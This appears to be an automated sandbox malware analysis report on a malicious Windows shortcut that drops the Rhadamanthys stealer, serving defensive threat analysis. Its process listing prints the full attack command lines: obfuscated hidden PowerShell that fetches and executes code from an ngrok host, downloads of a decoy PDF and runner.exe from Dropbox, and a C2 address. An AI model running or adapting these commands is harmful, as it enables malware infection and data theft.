Edit tour
Windows
Analysis Report
pkqLAMAv96.lnk
Overview
General Information
Sample name: | pkqLAMAv96.lnkrenamed because original name is a hash value |
Original sample name: | 09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1(1).lnk |
Analysis ID: | 1576697 |
MD5: | 9436a53ad2403b16af623a46efe0aaf2 |
SHA1: | 2beb0c794491ef17fe11d4ea531e1ed725487a82 |
SHA256: | 09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 4300 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias ba6 4 curl ; s al a6eb iE x ; a6eb(b a64 -Uri h ttps://1zf 9cygs0q3iv iyowq83ddw zwtgf78rh. ngrok.app/ api/secure /3fee076f9 528f690839 c19be95e03 4f2 -UseBa sicParsing ) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4200 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias ba64 c url ; sal a6eb iEx ; a6eb(ba64 -Uri http s://1zf9cy gs0q3iviyo wq83ddwzwt gf78rh.ngr ok.app/api /secure/3f ee076f9528 f690839c19 be95e034f2 -UseBasic Parsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 3908 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/dgiur64v awmdx9alqw 6et/Lewis- Silkin-LLP .pdf?rlkey =kduhqrnp0 0rj44rjepp uw31qk&dl= 1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 4936 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 80 --field -trial-han dle=2060,i ,331403182 9294604872 ,339536637 3032741599 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - cmd.exe (PID: 8296 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\3975 0847.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8376 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1' -OutFile $ RandomPDF; Start-Pro cess -File Path 'msed ge.exe' -A rgumentLis t '--kiosk ', $Random PDF; Invok e-WebReque st -Uri 'h ttps://www .dropbox.c om/scl/fi/ g33vds4uvy 26a8v7ble7 g/runner.e xe?rlkey=c qe2asmea4s h0uo2xxsst xzdd&dl=1' -OutFile $RandomEXE ; Start-Pr ocess -Fil ePath $Ran domEXE; if (Test-Pat h $RandomE XE) { Invo ke-WebRequ est -Uri ' https://1z f9cygs0q3i viyowq83dd wzwtgf78rh .ngrok.app /metadata/ 3fee076f95 28f690839c 19be95e034 f2'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 6692 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\393505 54-cb9f-45 77-be49-6b 699e44992e .pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8232 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 40 --field -trial-han dle=1452,i ,125753403 6481701438 9,13679646 3132725499 84,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - f403e587-89ca-44df-ac2b-662ec52ae877.exe (PID: 8552 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\f403e5 87-89ca-44 df-ac2b-66 2ec52ae877 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - f403e587-89ca-44df-ac2b-662ec52ae877.exe (PID: 8692 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\f403e5 87-89ca-44 df-ac2b-66 2ec52ae877 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - fontdrvhost.exe (PID: 8808 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 5884 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 3136 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 5 884 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 8716 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 8 692 -s 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 4660 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7176 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7560 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=24 16 --field -trial-han dle=2392,i ,715728795 4465730072 ,903591999 4940198210 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8852 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6384 --fie ld-trial-h andle=2392 ,i,7157287 9544657300 72,9035919 9949401982 10,262144 /prefetch: 8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8872 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6680 --field-t rial-handl e=2392,i,7 1572879544 65730072,9 0359199949 40198210,2 62144 /pre fetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5804 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7324 --f ield-trial -handle=23 92,i,71572 8795446573 0072,90359 1999494019 8210,26214 4 /prefetc h:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5940 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7992 --field-t rial-handl e=2392,i,7 1572879544 65730072,9 0359199949 40198210,2 62144 /pre fetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8448 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=666 0 --field- trial-hand le=2392,i, 7157287954 465730072, 9035919994 940198210, 262144 /pr efetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 5 entries |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |